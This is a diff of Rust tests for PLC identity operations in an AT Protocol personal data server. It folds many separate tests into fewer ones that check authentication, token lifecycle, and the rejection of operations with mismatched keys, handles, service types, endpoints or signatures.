#[tokio::test] 193 - async fn test_request_plc_operation_creates_token_in_db() { 194 let client = client(); 195 let (token, did) = create_account_and_login(&client).await; 196 - let res = client 197 - .post(format!( 198 - "{}/xrpc/com.atproto.identity.requestPlcOperationSignature", 199 - base_url().await 200 - )) 201 - .bearer_auth(&token) 202 - .send() 203 - .await 204 - .expect("Request failed"); 205 assert_eq!(res.status(), StatusCode::OK); 206 let db_url = get_db_connection_string().await; 207 - let pool = PgPool::connect(&db_url).await.expect("DB connect failed"); 208 let row = sqlx::query!( 209 - r#" 210 - SELECT t.token, t.expires_at 211 - FROM plc_operation_tokens t 212 - JOIN users u ON t.user_id = u.id 213 - WHERE u.did = $1 214 - "#, 215 did 216 - ) 217 - .fetch_optional(&pool) 218 - .await 219 - .expect("Query failed"); 220 assert!(row.is_some(), "PLC token should be created in database"); 221 let row = row.unwrap(); 222 - assert!( 223 - row.token.len() == 11, 224 - "Token should be in format xxxxx-xxxxx" 225 - ); 226 assert!(row.token.contains('-'), "Token should contain hyphen"); 227 - assert!( 228 - row.expires_at > chrono::Utc::now(), 229 - "Token should not be expired" 230 - ); 231 - } 232 - 233 - #[tokio::test] 234 - async fn test_request_plc_operation_replaces_existing_token() { 235 - let client = client(); 236 - let (token, did) = create_account_and_login(&client).await; 237 - let res1 = client 238 - .post(format!( 239 - "{}/xrpc/com.atproto.identity.requestPlcOperationSignature", 240 - base_url().await 241 - )) 242 - .bearer_auth(&token) 243 - .send() 244 - .await 245 - .expect("Request 1 failed"); 246 - assert_eq!(res1.status(), StatusCode::OK); 247 - let db_url = get_db_connection_string().await; 248 - let pool = PgPool::connect(&db_url).await.expect("DB connect failed"); 249 - let token1 = sqlx::query_scalar!( 250 - r#" 251 - SELECT t.token 252 - FROM plc_operation_tokens t 253 - JOIN users u ON t.user_id = u.id 254 - WHERE u.did = $1 255 - "#, 256 - did 257 - ) 258 - .fetch_one(&pool) 259 - .await 260 - .expect("Query failed"); 261 - let res2 = client 262 - .post(format!( 263 - "{}/xrpc/com.atproto.identity.requestPlcOperationSignature", 264 - base_url().await 265 - )) 266 - .bearer_auth(&token) 267 - .send() 268 - .await 269 - .expect("Request 2 failed"); 270 - assert_eq!(res2.status(), StatusCode::OK); 271 let token2 = sqlx::query_scalar!( 272 - r#" 273 - SELECT t.token 274 - FROM plc_operation_tokens t 275 - JOIN users u ON t.user_id = u.id 276 - WHERE u.did = $1 277 - "#, 278 - did 279 - ) 280 - .fetch_one(&pool) 281 - .await 282 - .expect("Query failed"); 283 assert_ne!(token1, token2, "Second request should generate a new token"); 284 let count: i64 = sqlx::query_scalar!( 285 - r#" 286 - SELECT COUNT(*) as "count!" 287 - FROM plc_operation_tokens t 288 - JOIN users u ON t.user_id = u.id 289 - WHERE u.did = $1 290 - "#, 291 - did 292 - ) 293 - .fetch_one(&pool) 294 - .await 295 - .expect("Count query failed"); 296 assert_eq!(count, 1, "Should only have one token per user"); 297 } 298 - 299 - #[tokio::test] 300 - async fn test_submit_plc_operation_wrong_verification_method() { 301 - let client = client(); 302 - let (token, did) = create_account_and_login(&client).await; 303 - let hostname = 304 - std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| format!("127.0.0.1:{}", app_port())); 305 - let handle = did.split(':').last().unwrap_or("user"); 306 - let res = client 307 - .post(format!( 308 - "{}/xrpc/com.atproto.identity.submitPlcOperation", 309 - base_url().await 310 - )) 311 - .bearer_auth(&token) 312 - .json(&json!({ 313 - "operation": { 314 - "type": "plc_operation", 315 - "rotationKeys": ["did:key:zWrongRotationKey123"], 316 - "verificationMethods": {"atproto": "did:key:zWrongVerificationKey456"}, 317 - "alsoKnownAs": [format!("at://{}", handle)], 318 - "services": { 319 - "atproto_pds": { 320 - "type": "AtprotoPersonalDataServer", 321 - "endpoint": format!("https://{}", hostname) 322 - } 323 - }, 324 - "prev": null, 325 - "sig": "fake_signature" 326 - } 327 - })) 328 - .send() 329 - .await 330 - .expect("Request failed"); 331 - assert_eq!(res.status(), StatusCode::BAD_REQUEST); 332 - let body: serde_json::Value = res.json().await.unwrap(); 333 - assert_eq!(body["error"], "InvalidRequest"); 334 - assert!( 335 - body["message"] 336 - .as_str() 337 - .unwrap_or("") 338 - .contains("signing key") 339 - || body["message"].as_str().unwrap_or("").contains("rotation"), 340 - "Error should mention key mismatch: {:?}", 341 - body 342 - ); 343 - } 344 - 345 - #[tokio::test] 346 - async fn test_submit_plc_operation_wrong_handle() { 347 - let client = client(); 348 - let (token, _did) = create_account_and_login(&client).await; 349 - let hostname = 350 - std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| format!("127.0.0.1:{}", app_port())); 351 - let res = client 352 - .post(format!( 353 - "{}/xrpc/com.atproto.identity.submitPlcOperation", 354 - base_url().await 355 - )) 356 - .bearer_auth(&token) 357 - .json(&json!({ 358 - "operation": { 359 - "type": "plc_operation", 360 - "rotationKeys": ["did:key:z123"], 361 - "verificationMethods": {"atproto": "did:key:z456"}, 362 - "alsoKnownAs": ["at://totally.wrong.handle"], 363 - "services": { 364 - "atproto_pds": { 365 - "type": "AtprotoPersonalDataServer", 366 - "endpoint": format!("https://{}", hostname) 367 - } 368 - }, 369 - "prev": null, 370 - "sig": "fake_signature" 371 - } 372 - })) 373 - .send() 374 - .await 375 - .expect("Request failed"); 376 - assert_eq!(res.status(), StatusCode::BAD_REQUEST); 377 - let body: serde_json::Value = res.json().await.unwrap(); 378 - assert_eq!(body["error"], "InvalidRequest"); 379 - } 380 - 381 - #[tokio::test] 382 - async fn test_submit_plc_operation_wrong_service_type() { 383 - let client = client(); 384 - let (token, _did) = create_account_and_login(&client).await; 385 - let hostname = 386 - std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| format!("127.0.0.1:{}", app_port())); 387 - let res = client 388 - .post(format!( 389 - "{}/xrpc/com.atproto.identity.submitPlcOperation", 390 - base_url().await 391 - )) 392 - .bearer_auth(&token) 393 - .json(&json!({ 394 - "operation": { 395 - "type": "plc_operation", 396 - "rotationKeys": ["did:key:z123"], 397 - "verificationMethods": {"atproto": "did:key:z456"}, 398 - "alsoKnownAs": ["at://user"], 399 - "services": { 400 - "atproto_pds": { 401 - "type": "WrongServiceType", 402 - "endpoint": format!("https://{}", hostname) 403 - } 404 - }, 405 - "prev": null, 406 - "sig": "fake_signature" 407 - } 408 - })) 409 - .send() 410 - .await 411 - .expect("Request failed"); 412 - assert_eq!(res.status(), StatusCode::BAD_REQUEST); 413 - let body: serde_json::Value = res.json().await.unwrap(); 414 - assert_eq!(body["error"], "InvalidRequest"); 415 - } 416 - 417 - #[tokio::test] 418 - async fn test_plc_token_expiry_format() { 419 - let client = client(); 420 - let (token, did) = create_account_and_login(&client).await; 421 - let res = client 422 - .post(format!( 423 - "{}/xrpc/com.atproto.identity.requestPlcOperationSignature", 424 - base_url().await 425 - )) 426 - .bearer_auth(&token) 427 - .send() 428 - .await 429 - .expect("Request failed"); 430 - assert_eq!(res.status(), StatusCode::OK); 431 - let db_url = get_db_connection_string().await; 432 - let pool = PgPool::connect(&db_url).await.expect("DB connect failed"); 433 - let row = sqlx::query!( 434 - r#" 435 - SELECT t.expires_at 436 - FROM plc_operation_tokens t 437 - JOIN users u ON t.user_id = u.id 438 - WHERE u.did = $1 439 - "#, 440 - did 441 - ) 442 - .fetch_one(&pool) 443 - .await 444 - .expect("Query failed"); 445 - let now = chrono::Utc::now(); 446 - let expires = row.expires_at; 447 - let diff = expires - now; 448 - assert!( 449 - diff.num_minutes() >= 9, 450 - "Token should expire in ~10 minutes, got {} minutes", 451 - diff.num_minutes() 452 - ); 453 - assert!( 454 - diff.num_minutes() <= 11, 455 - "Token should expire in ~10 minutes, got {} minutes", 456 - diff.num_minutes() 457 - ); 458 - }
··· 5 use sqlx::PgPool; 6 7 #[tokio::test] 8 + async fn test_plc_operation_auth() { 9 let client = client(); 10 + let res = client.post(format!("{}/xrpc/com.atproto.identity.requestPlcOperationSignature", base_url().await)) 11 + .send().await.unwrap(); 12 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 13 + let res = client.post(format!("{}/xrpc/com.atproto.identity.signPlcOperation", base_url().await)) 14 + .json(&json!({})).send().await.unwrap(); 15 + assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 16 + let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await)) 17 + .json(&json!({ "operation": {} })).send().await.unwrap(); 18 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 19 + let (token, _) = create_account_and_login(&client).await; 20 + let res = client.post(format!("{}/xrpc/com.atproto.identity.requestPlcOperationSignature", base_url().await)) 21 + .bearer_auth(&token).send().await.unwrap(); 22 + assert_eq!(res.status(), StatusCode::OK); 23 } 24 25 #[tokio::test] 26 + async fn test_sign_plc_operation_validation() { 27 let client = client(); 28 + let (token, _) = create_account_and_login(&client).await; 29 + let res = client.post(format!("{}/xrpc/com.atproto.identity.signPlcOperation", base_url().await)) 30 + .bearer_auth(&token).json(&json!({})).send().await.unwrap(); 31 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 32 let body: serde_json::Value = res.json().await.unwrap(); 33 assert_eq!(body["error"], "InvalidRequest"); 34 + let res = client.post(format!("{}/xrpc/com.atproto.identity.signPlcOperation", base_url().await)) 35 + .bearer_auth(&token).json(&json!({ "token": "invalid-token-12345" })).send().await.unwrap(); 36 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 37 let body: serde_json::Value = res.json().await.unwrap(); 38 assert!(body["error"] == "InvalidToken" || body["error"] == "ExpiredToken"); 39 } 40 41 #[tokio::test] 42 + async fn test_submit_plc_operation_validation() { 43 let client = client(); 44 + let (token, did) = create_account_and_login(&client).await; 45 + let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| format!("127.0.0.1:{}", app_port())); 46 + let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await)) 47 + .bearer_auth(&token).json(&json!({ "operation": { "type": "invalid_type" } })).send().await.unwrap(); 48 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 49 let body: serde_json::Value = res.json().await.unwrap(); 50 assert_eq!(body["error"], "InvalidRequest"); 51 + let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await)) 52 + .bearer_auth(&token).json(&json!({ 53 + "operation": { "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, 54 + "alsoKnownAs": [], "services": {}, "prev": null } 55 + })).send().await.unwrap(); 56 + assert_eq!(res.status(), StatusCode::BAD_REQUEST); 57 + let handle = did.split(':').last().unwrap_or("user"); 58 + let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await)) 59 + .bearer_auth(&token).json(&json!({ 60 + "operation": { "type": "plc_operation", "rotationKeys": ["did:key:z123"], 61 + "verificationMethods": { "atproto": "did:key:z456" }, 62 + "alsoKnownAs": [format!("at://{}", handle)], 63 + "services": { "atproto_pds": { "type": "AtprotoPersonalDataServer", "endpoint": "https://wrong.example.com" } }, 64 + "prev": null, "sig": "fake_signature" } 65 + })).send().await.unwrap(); 66 + assert_eq!(res.status(), StatusCode::BAD_REQUEST); 67 + let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await)) 68 + .bearer_auth(&token).json(&json!({ 69 + "operation": { "type": "plc_operation", "rotationKeys": ["did:key:zWrongRotationKey123"], 70 + "verificationMethods": { "atproto": "did:key:zWrongVerificationKey456" }, 71 + "alsoKnownAs": [format!("at://{}", handle)], 72 + "services": { "atproto_pds": { "type": "AtprotoPersonalDataServer", "endpoint": format!("https://{}", hostname) } }, 73 + "prev": null, "sig": "fake_signature" } 74 + })).send().await.unwrap(); 75 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 76 let body: serde_json::Value = res.json().await.unwrap(); 77 assert_eq!(body["error"], "InvalidRequest"); 78 + assert!(body["message"].as_str().unwrap_or("").contains("signing key") || body["message"].as_str().unwrap_or("").contains("rotation")); 79 + let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await)) 80 + .bearer_auth(&token).json(&json!({ 81 + "operation": { "type": "plc_operation", "rotationKeys": ["did:key:z123"], 82 + "verificationMethods": { "atproto": "did:key:z456" }, 83 + "alsoKnownAs": ["at://totally.wrong.handle"], 84 + "services": { "atproto_pds": { "type": "AtprotoPersonalDataServer", "endpoint": format!("https://{}", hostname) } }, 85 + "prev": null, "sig": "fake_signature" } 86 + })).send().await.unwrap(); 87 + assert_eq!(res.status(), StatusCode::BAD_REQUEST); 88 + let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await)) 89 + .bearer_auth(&token).json(&json!({ 90 + "operation": { "type": "plc_operation", "rotationKeys": ["did:key:z123"], 91 + "verificationMethods": { "atproto": "did:key:z456" }, 92 + "alsoKnownAs": ["at://user"], 93 + "services": { "atproto_pds": { "type": "WrongServiceType", "endpoint": format!("https://{}", hostname) } }, 94 + "prev": null, "sig": "fake_signature" } 95 + })).send().await.unwrap(); 96 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 97 } 98 99 #[tokio::test] 100 + async fn test_plc_token_lifecycle() { 101 let client = client(); 102 let (token, did) = create_account_and_login(&client).await; 103 + let res = client.post(format!("{}/xrpc/com.atproto.identity.requestPlcOperationSignature", base_url().await)) 104 + .bearer_auth(&token).send().await.unwrap(); 105 assert_eq!(res.status(), StatusCode::OK); 106 let db_url = get_db_connection_string().await; 107 + let pool = PgPool::connect(&db_url).await.unwrap(); 108 let row = sqlx::query!( 109 + "SELECT t.token, t.expires_at FROM plc_operation_tokens t JOIN users u ON t.user_id = u.id WHERE u.did = $1", 110 did 111 + ).fetch_optional(&pool).await.unwrap(); 112 assert!(row.is_some(), "PLC token should be created in database"); 113 let row = row.unwrap(); 114 + assert_eq!(row.token.len(), 11, "Token should be in format xxxxx-xxxxx"); 115 assert!(row.token.contains('-'), "Token should contain hyphen"); 116 + assert!(row.expires_at > chrono::Utc::now(), "Token should not be expired"); 117 + let diff = row.expires_at - chrono::Utc::now(); 118 + assert!(diff.num_minutes() >= 9 && diff.num_minutes() <= 11, "Token should expire in ~10 minutes"); 119 + let token1 = row.token.clone(); 120 + let res = client.post(format!("{}/xrpc/com.atproto.identity.requestPlcOperationSignature", base_url().await)) 121 + .bearer_auth(&token).send().await.unwrap(); 122 + assert_eq!(res.status(), StatusCode::OK); 123 let token2 = sqlx::query_scalar!( 124 + "SELECT t.token FROM plc_operation_tokens t JOIN users u ON t.user_id = u.id WHERE u.did = $1", did 125 + ).fetch_one(&pool).await.unwrap(); 126 assert_ne!(token1, token2, "Second request should generate a new token"); 127 let count: i64 = sqlx::query_scalar!( 128 + "SELECT COUNT(*) as \"count!\" FROM plc_operation_tokens t JOIN users u ON t.user_id = u.id WHERE u.did = $1", did 129 + ).fetch_one(&pool).await.unwrap(); 130 assert_eq!(count, 1, "Should only have one token per user"); 131 }
+82 -367
tests/plc_validation.rs
··· 13 let op = json!({ 14 "type": "plc_operation", 15 "rotationKeys": [did_key.clone()], 16 - "verificationMethods": { 17 - "atproto": did_key.clone() 18 - }, 19 "alsoKnownAs": ["at://test.handle"], 20 "services": { 21 "atproto_pds": { ··· 29 } 30 31 #[test] 32 - fn test_validate_plc_operation_valid() { 33 let op = create_valid_operation(); 34 - let result = validate_plc_operation(&op); 35 - assert!(result.is_ok()); 36 - } 37 38 - #[test] 39 - fn test_validate_plc_operation_missing_type() { 40 - let op = json!({ 41 - "rotationKeys": [], 42 - "verificationMethods": {}, 43 - "alsoKnownAs": [], 44 - "services": {}, 45 - "sig": "test" 46 - }); 47 - let result = validate_plc_operation(&op); 48 - assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing type"))); 49 - } 50 51 - #[test] 52 - fn test_validate_plc_operation_invalid_type() { 53 - let op = json!({ 54 - "type": "invalid_type", 55 - "sig": "test" 56 - }); 57 - let result = validate_plc_operation(&op); 58 - assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Invalid type"))); 59 - } 60 61 - #[test] 62 - fn test_validate_plc_operation_missing_sig() { 63 - let op = json!({ 64 - "type": "plc_operation", 65 - "rotationKeys": [], 66 - "verificationMethods": {}, 67 - "alsoKnownAs": [], 68 - "services": {} 69 - }); 70 - let result = validate_plc_operation(&op); 71 - assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing sig"))); 72 - } 73 74 - #[test] 75 - fn test_validate_plc_operation_missing_rotation_keys() { 76 - let op = json!({ 77 - "type": "plc_operation", 78 - "verificationMethods": {}, 79 - "alsoKnownAs": [], 80 - "services": {}, 81 - "sig": "test" 82 - }); 83 - let result = validate_plc_operation(&op); 84 - assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("rotationKeys"))); 85 - } 86 87 - #[test] 88 - fn test_validate_plc_operation_missing_verification_methods() { 89 - let op = json!({ 90 - "type": "plc_operation", 91 - "rotationKeys": [], 92 - "alsoKnownAs": [], 93 - "services": {}, 94 - "sig": "test" 95 - }); 96 - let result = validate_plc_operation(&op); 97 - assert!( 98 - matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("verificationMethods")) 99 - ); 100 - } 101 102 - #[test] 103 - fn test_validate_plc_operation_missing_also_known_as() { 104 - let op = json!({ 105 - "type": "plc_operation", 106 - "rotationKeys": [], 107 - "verificationMethods": {}, 108 - "services": {}, 109 - "sig": "test" 110 - }); 111 - let result = validate_plc_operation(&op); 112 - assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("alsoKnownAs"))); 113 - } 114 115 - #[test] 116 - fn test_validate_plc_operation_missing_services() { 117 - let op = json!({ 118 - "type": "plc_operation", 119 - "rotationKeys": [], 120 - "verificationMethods": {}, 121 - "alsoKnownAs": [], 122 - "sig": "test" 123 - }); 124 - let result = validate_plc_operation(&op); 125 - assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("services"))); 126 } 127 128 #[test] 129 - fn test_validate_rotation_key_required() { 130 let key = SigningKey::random(&mut rand::thread_rng()); 131 let did_key = signing_key_to_did_key(&key); 132 let server_key = "did:key:zServer123"; 133 - let op = json!({ 134 "type": "plc_operation", 135 - "rotationKeys": [did_key.clone()], 136 - "verificationMethods": {"atproto": did_key.clone()}, 137 - "alsoKnownAs": ["at://test.handle"], 138 - "services": { 139 - "atproto_pds": { 140 - "type": "AtprotoPersonalDataServer", 141 - "endpoint": "https://pds.example.com" 142 - } 143 - }, 144 "sig": "test" 145 }); 146 let ctx = PlcValidationContext { 147 server_rotation_key: server_key.to_string(), 148 expected_signing_key: did_key.clone(), 149 expected_handle: "test.handle".to_string(), 150 expected_pds_endpoint: "https://pds.example.com".to_string(), 151 }; 152 - let result = validate_plc_operation_for_submission(&op, &ctx); 153 - assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("rotation key"))); 154 - } 155 156 - #[test] 157 - fn test_validate_signing_key_match() { 158 - let key = SigningKey::random(&mut rand::thread_rng()); 159 - let did_key = signing_key_to_did_key(&key); 160 - let wrong_key = "did:key:zWrongKey456"; 161 - let op = json!({ 162 - "type": "plc_operation", 163 - "rotationKeys": [did_key.clone()], 164 - "verificationMethods": {"atproto": wrong_key}, 165 - "alsoKnownAs": ["at://test.handle"], 166 - "services": { 167 - "atproto_pds": { 168 - "type": "AtprotoPersonalDataServer", 169 - "endpoint": "https://pds.example.com" 170 - } 171 - }, 172 - "sig": "test" 173 - }); 174 - let ctx = PlcValidationContext { 175 - server_rotation_key: did_key.clone(), 176 - expected_signing_key: did_key.clone(), 177 - expected_handle: "test.handle".to_string(), 178 - expected_pds_endpoint: "https://pds.example.com".to_string(), 179 - }; 180 - let result = validate_plc_operation_for_submission(&op, &ctx); 181 - assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("signing key"))); 182 - } 183 184 - #[test] 185 - fn test_validate_handle_match() { 186 - let key = SigningKey::random(&mut rand::thread_rng()); 187 - let did_key = signing_key_to_did_key(&key); 188 - let op = json!({ 189 - "type": "plc_operation", 190 - "rotationKeys": [did_key.clone()], 191 - "verificationMethods": {"atproto": did_key.clone()}, 192 - "alsoKnownAs": ["at://wrong.handle"], 193 - "services": { 194 - "atproto_pds": { 195 - "type": "AtprotoPersonalDataServer", 196 - "endpoint": "https://pds.example.com" 197 - } 198 - }, 199 - "sig": "test" 200 - }); 201 - let ctx = PlcValidationContext { 202 server_rotation_key: did_key.clone(), 203 expected_signing_key: did_key.clone(), 204 expected_handle: "test.handle".to_string(), 205 expected_pds_endpoint: "https://pds.example.com".to_string(), 206 }; 207 - let result = validate_plc_operation_for_submission(&op, &ctx); 208 - assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("handle"))); 209 - } 210 211 - #[test] 212 - fn test_validate_pds_service_type() { 213 - let key = SigningKey::random(&mut rand::thread_rng()); 214 - let did_key = signing_key_to_did_key(&key); 215 - let op = json!({ 216 - "type": "plc_operation", 217 - "rotationKeys": [did_key.clone()], 218 - "verificationMethods": {"atproto": did_key.clone()}, 219 - "alsoKnownAs": ["at://test.handle"], 220 - "services": { 221 - "atproto_pds": { 222 - "type": "WrongServiceType", 223 - "endpoint": "https://pds.example.com" 224 - } 225 - }, 226 - "sig": "test" 227 - }); 228 - let ctx = PlcValidationContext { 229 - server_rotation_key: did_key.clone(), 230 - expected_signing_key: did_key.clone(), 231 - expected_handle: "test.handle".to_string(), 232 - expected_pds_endpoint: "https://pds.example.com".to_string(), 233 - }; 234 - let result = validate_plc_operation_for_submission(&op, &ctx); 235 - assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("type"))); 236 - } 237 238 - #[test] 239 - fn test_validate_pds_endpoint_match() { 240 - let key = SigningKey::random(&mut rand::thread_rng()); 241 - let did_key = signing_key_to_did_key(&key); 242 - let op = json!({ 243 - "type": "plc_operation", 244 - "rotationKeys": [did_key.clone()], 245 - "verificationMethods": {"atproto": did_key.clone()}, 246 - "alsoKnownAs": ["at://test.handle"], 247 - "services": { 248 - "atproto_pds": { 249 - "type": "AtprotoPersonalDataServer", 250 - "endpoint": "https://wrong.endpoint.com" 251 - } 252 - }, 253 - "sig": "test" 254 - }); 255 - let ctx = PlcValidationContext { 256 - server_rotation_key: did_key.clone(), 257 - expected_signing_key: did_key.clone(), 258 - expected_handle: "test.handle".to_string(), 259 - expected_pds_endpoint: "https://pds.example.com".to_string(), 260 - }; 261 - let result = validate_plc_operation_for_submission(&op, &ctx); 262 - assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("endpoint"))); 263 } 264 265 #[test] 266 - fn test_verify_signature_secp256k1() { 267 let key = SigningKey::random(&mut rand::thread_rng()); 268 let did_key = signing_key_to_did_key(&key); 269 let op = json!({ 270 - "type": "plc_operation", 271 - "rotationKeys": [did_key.clone()], 272 - "verificationMethods": {}, 273 - "alsoKnownAs": [], 274 - "services": {}, 275 - "prev": null 276 }); 277 let signed = sign_operation(&op, &key).unwrap(); 278 - let rotation_keys = vec![did_key]; 279 - let result = verify_operation_signature(&signed, &rotation_keys); 280 - assert!(result.is_ok()); 281 - assert!(result.unwrap()); 282 - } 283 284 - #[test] 285 - fn test_verify_signature_wrong_key() { 286 - let key = SigningKey::random(&mut rand::thread_rng()); 287 let other_key = SigningKey::random(&mut rand::thread_rng()); 288 - let other_did_key = signing_key_to_did_key(&other_key); 289 - let op = json!({ 290 - "type": "plc_operation", 291 - "rotationKeys": [], 292 - "verificationMethods": {}, 293 - "alsoKnownAs": [], 294 - "services": {}, 295 - "prev": null 296 - }); 297 - let signed = sign_operation(&op, &key).unwrap(); 298 - let wrong_rotation_keys = vec![other_did_key]; 299 - let result = verify_operation_signature(&signed, &wrong_rotation_keys); 300 - assert!(result.is_ok()); 301 - assert!(!result.unwrap()); 302 - } 303 304 - #[test] 305 - fn test_verify_signature_invalid_did_key_format() { 306 - let key = SigningKey::random(&mut rand::thread_rng()); 307 - let op = json!({ 308 - "type": "plc_operation", 309 - "rotationKeys": [], 310 - "verificationMethods": {}, 311 - "alsoKnownAs": [], 312 - "services": {}, 313 - "prev": null 314 - }); 315 - let signed = sign_operation(&op, &key).unwrap(); 316 - let invalid_keys = vec!["not-a-did-key".to_string()]; 317 - let result = verify_operation_signature(&signed, &invalid_keys); 318 - assert!(result.is_ok()); 319 - assert!(!result.unwrap()); 320 - } 321 322 - #[test] 323 - fn test_tombstone_validation() { 324 - let op = json!({ 325 - "type": "plc_tombstone", 326 - "prev": "bafyreig6xxxxxyyyyyzzzzzz", 327 - "sig": "test" 328 }); 329 - let result = validate_plc_operation(&op); 330 - assert!(result.is_ok()); 331 } 332 333 #[test] 334 - fn test_cid_for_cbor_deterministic() { 335 - let value = json!({ 336 - "alpha": 1, 337 - "beta": 2 338 - }); 339 let cid1 = cid_for_cbor(&value).unwrap(); 340 let cid2 = cid_for_cbor(&value).unwrap(); 341 - assert_eq!(cid1, cid2, "CID generation should be deterministic"); 342 - assert!( 343 - cid1.starts_with("bafyrei"), 344 - "CID should start with bafyrei (dag-cbor + sha256)" 345 - ); 346 - } 347 348 - #[test] 349 - fn test_cid_different_for_different_data() { 350 - let value1 = json!({"data": 1}); 351 - let value2 = json!({"data": 2}); 352 - let cid1 = cid_for_cbor(&value1).unwrap(); 353 - let cid2 = cid_for_cbor(&value2).unwrap(); 354 - assert_ne!(cid1, cid2, "Different data should produce different CIDs"); 355 - } 356 357 - #[test] 358 - fn test_signing_key_to_did_key_format() { 359 let key = SigningKey::random(&mut rand::thread_rng()); 360 - let did_key = signing_key_to_did_key(&key); 361 - assert!( 362 - did_key.starts_with("did:key:z"), 363 - "Should start with did:key:z" 364 - ); 365 - assert!(did_key.len() > 50, "Did key should be reasonably long"); 366 - } 367 368 - #[test] 369 - fn test_signing_key_to_did_key_unique() { 370 - let key1 = SigningKey::random(&mut rand::thread_rng()); 371 let key2 = SigningKey::random(&mut rand::thread_rng()); 372 - let did1 = signing_key_to_did_key(&key1); 373 - let did2 = signing_key_to_did_key(&key2); 374 - assert_ne!( 375 - did1, did2, 376 - "Different keys should produce different did:keys" 377 - ); 378 - } 379 - 380 - #[test] 381 - fn test_signing_key_to_did_key_consistent() { 382 - let key = SigningKey::random(&mut rand::thread_rng()); 383 - let did1 = signing_key_to_did_key(&key); 384 - let did2 = signing_key_to_did_key(&key); 385 - assert_eq!(did1, did2, "Same key should produce same did:key"); 386 - } 387 - 388 - #[test] 389 - fn test_sign_operation_removes_existing_sig() { 390 - let key = SigningKey::random(&mut rand::thread_rng()); 391 - let op = json!({ 392 - "type": "plc_operation", 393 - "rotationKeys": [], 394 - "verificationMethods": {}, 395 - "alsoKnownAs": [], 396 - "services": {}, 397 - "prev": null, 398 - "sig": "old_signature" 399 - }); 400 - let signed = sign_operation(&op, &key).unwrap(); 401 - let new_sig = signed.get("sig").and_then(|v| v.as_str()).unwrap(); 402 - assert_ne!(new_sig, "old_signature", "Should replace old signature"); 403 } 404 405 #[test] 406 - fn test_validate_plc_operation_not_object() { 407 - let result = validate_plc_operation(&json!("not an object")); 408 - assert!(matches!(result, Err(PlcError::InvalidResponse(_)))); 409 - } 410 411 - #[test] 412 - fn test_validate_for_submission_tombstone_passes() { 413 let key = SigningKey::random(&mut rand::thread_rng()); 414 let did_key = signing_key_to_did_key(&key); 415 - let op = json!({ 416 - "type": "plc_tombstone", 417 - "prev": "bafyreig6xxxxxyyyyyzzzzzz", 418 - "sig": "test" 419 - }); 420 let ctx = PlcValidationContext { 421 server_rotation_key: did_key.clone(), 422 expected_signing_key: did_key, 423 expected_handle: "test.handle".to_string(), 424 expected_pds_endpoint: "https://pds.example.com".to_string(), 425 }; 426 - let result = validate_plc_operation_for_submission(&op, &ctx); 427 - assert!( 428 - result.is_ok(), 429 - "Tombstone should pass submission validation" 430 - ); 431 - } 432 - 433 - #[test] 434 - fn test_verify_signature_missing_sig() { 435 - let op = json!({ 436 - "type": "plc_operation", 437 - "rotationKeys": [], 438 - "verificationMethods": {}, 439 - "alsoKnownAs": [], 440 - "services": {} 441 - }); 442 - let result = verify_operation_signature(&op, &[]); 443 - assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("sig"))); 444 } 445 446 #[test] 447 - fn test_verify_signature_invalid_base64() { 448 let op = json!({ 449 - "type": "plc_operation", 450 - "rotationKeys": [], 451 - "verificationMethods": {}, 452 - "alsoKnownAs": [], 453 - "services": {}, 454 - "sig": "not-valid-base64!!!" 455 }); 456 - let result = verify_operation_signature(&op, &[]); 457 - assert!(matches!(result, Err(PlcError::InvalidResponse(_)))); 458 - } 459 460 - #[test] 461 - fn test_plc_operation_struct() { 462 let mut services = HashMap::new(); 463 - services.insert( 464 - "atproto_pds".to_string(), 465 - PlcService { 466 - service_type: "AtprotoPersonalDataServer".to_string(), 467 - endpoint: "https://pds.example.com".to_string(), 468 - }, 469 - ); 470 let mut verification_methods = HashMap::new(); 471 verification_methods.insert("atproto".to_string(), "did:key:zTest123".to_string()); 472 let op = PlcOperation {
